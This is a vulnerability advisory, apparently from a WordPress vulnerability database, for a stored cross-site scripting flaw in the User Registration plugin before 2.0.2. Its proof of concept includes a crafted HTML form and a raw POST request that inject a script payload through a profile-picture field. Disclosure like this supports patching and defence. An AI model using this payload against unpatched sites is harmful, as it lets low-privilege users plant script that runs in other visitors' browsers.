WordPress Plugin Vulnerabilities
User Registration < 2.0.2 - Low Privilege Stored Cross-Site Scripting
Description
The plugin does not properly sanitise the user_registration_profile_pic_url value when submitted directly via the user_registration_update_profile_details AJAX action. This could allow any authenticated user, such as subscriber, to perform Stored Cross-Site attacks when their profile is viewed
Proof of Concept
1. Login as any user (such as subscriber) and go to the edit profile page (the one generated by the plugin). 2. View the page source and get json var nonce "user_registration_profile_details_save" 3. Add the below form to the page and and replace the security nonce with the one from step 2, then submit it. 4. View the profile page (as any user) to trigger the XSS. <form action="/wp-admin/admin-ajax.php" method="post"> <input type="text" name="action" value="user_registration_update_profile_details"><br> <input type="text" name="security" value="143544a1fb"><br> <input type="text" name="form_data" value='{"user_registration_profile_pic_url":{"field_name":"user_registration_profile_pic_url","value":"\"><script>alert(1)<\/script>"}}'><br><br> <input type="submit" value="Submit"> </form> POST /wp-admin/admin-ajax.php HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 264 Connection: close Cookie: [your cookies, as any user] Upgrade-Insecure-Requests: 1 action=user_registration_update_profile_details&security=143544a1fb&form_data=%7B%22user_registration_profile_pic_url%22%3A%7B%22field_name%22%3A%22user_registration_profile_pic_url%22%2C%22value%22%3A%22%5C%22%3E%3Cscript%3Ealert%281%29%3C%5C%2Fscript%3E%22%7D%7D
Affects Plugins
References
CVE
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
AyeCode Ltd
Submitter
Stiofan
Submitter website
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-09-06 (about 2 years ago)
Added
2021-09-06 (about 2 years ago)
Last Updated
2022-04-08 (about 2 years ago)